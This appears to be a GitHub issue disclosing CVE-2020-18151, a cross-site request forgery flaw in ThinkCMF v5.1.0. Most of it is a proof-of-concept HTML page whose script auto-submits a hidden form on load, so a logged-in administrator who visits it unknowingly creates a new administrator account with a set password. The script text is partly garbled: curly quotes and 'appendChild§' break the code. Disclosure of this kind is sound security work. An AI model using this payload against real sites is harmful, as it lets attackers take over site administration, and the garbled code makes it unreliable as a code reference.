Headline
CVE-2020-18151: I found a CSRF vulnerability that can add the administrator account · Issue #580 · thinkcmf/thinkcmf
Cross Site Request Forgery (CSRF) vulnerability in ThinkCMF v5.1.0, which can add an admin account.
After the administrator loged in, open the page containing the following code. An administrator account will be added automatically.
(please replace “http://tp.im” in “url” with the domain name you set.)
<html><body>
<script type="text/javascript">
function post(url, fields)
{
var p = document.createElement(“form”);
p.action = url;
p.innerHTML = fields;
p.target = “_self";
p.method = “post";
document.body.appendChild§;
p.submit();
}
function csrf_hack()
{
var fields;
fields += " <input type="hidden” name="user_login” value="CSRFadministrator" />";
fields += " <input type="hidden" name="user_pass" value="admin1234" />";
fields += " <input type="hidden" name="user_email" value="[email protected]" />";
fields += " <input type="hidden" name="role_id[]" value="1" />";
var url = "http://tp.im/admin/user/addpost.html";
post(url, fields);
}
window.onload = function(){csrf_hack();}
</script>
</body></html>